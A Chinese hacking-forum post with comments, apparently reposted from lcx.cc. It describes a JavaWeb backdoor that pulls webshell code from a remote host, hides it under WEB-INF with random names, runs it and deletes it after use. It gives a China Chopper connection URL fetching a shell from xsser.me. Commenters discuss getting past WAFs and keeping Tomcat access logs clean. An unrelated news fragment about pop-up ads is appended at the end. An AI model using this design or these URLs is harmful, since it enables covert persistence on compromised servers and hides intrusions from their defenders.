我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如:
不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。
菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp
测试的时候还发现了一个jspx和jsp的一个小秘密:
用jspx的语法可以直接适用于jsp,也就是说可以把http://xsser.me/caidao/jspx.jspx的内容copy,然后保存到一个jsp文件里面一样可以正常访问。
现在要做的就是怎么去藏生成后门的代码了。
相关吐槽:
1#
yexin | 2013-10-27 14:24
前排留名。
2#
淡漠天空 (路人的世界) | 2013-10-27 14:30
用jspx的语法可以直接适用于jsp,也就是说可以把http://xsser.me/caidao/jspx.jspx的内容copy,然后保存到一个jsp文件里面一样可以正常访问。
这个的确 。。。。。也是不久前发现的
3#
核心白帽子 (发标题党的草泥马) | 2013-10-27 14:36
还不如放一个jsp的一句话上去每次要用的时候上传一个jsp大马 用完了之后将jsp大马删除..
跟你这也没多大区别..看不出这样有什么方便隐藏的优势
4#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-10-27 15:31
@核心白帽子 其实也没什么大的不同,只是记录一下。一点小区别,第一这个后门存在WEB-INF直接请求http://xxx.com/WEB-INF/xxx.jsp请求不到,某些WAF可能不会检查WEB-INF下的jsp。第二accesslog记录。
5#
Coody (&_&) | 2013-10-27 15:56
@园长 accesslog不记录 WEB-INF/ 下的文件访问么?
6#
龙臣 (据说共产党员的老婆更漂亮。) | 2013-10-27 16:02
传错了 忽略之
7#
淡漠天空 (路人的世界) | 2013-10-27 16:18
@园长 国内还好 国外的WEB-INF根本无权限 某些限定环境下是行不通的
8#
淡漠天空 (路人的世界) | 2013-10-27 16:19
WAF的规则决定能不能访问或者动WEB-INF 太局限了。。。
9#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-10-27 17:03
@Coody 请求shell会accesslog会记录下来的完整shell路径请求上面的后门记录的应该是参数。
测试了下Tomcat的Accesslog没有记录getRequestDispatcher forward的地址和参数:
0:0:0:0:0:0:0:1 - - [27/Oct/2013:17:01:42 +0800] "POST /Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp HTTP/1.1" 200 296
10#
wefgod (求大牛指点) | 2013-10-28 08:54
园长之前不是说filter可以?那个好像比较好
文章来源于lcx.cc:JavaWeb随机后门?
中广网北京2月3日消息(记者张棉棉)据中国之声《央广新闻》报道,工信部1月14日公布了《互联网信息服务市场秩序监督管理暂行办法(征求意见稿)》,向社会各界征求意见。反馈意见截止日期是2月14日。条例中,有一条非常引人关注,涉及内容为弹出式广告规范。 …
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论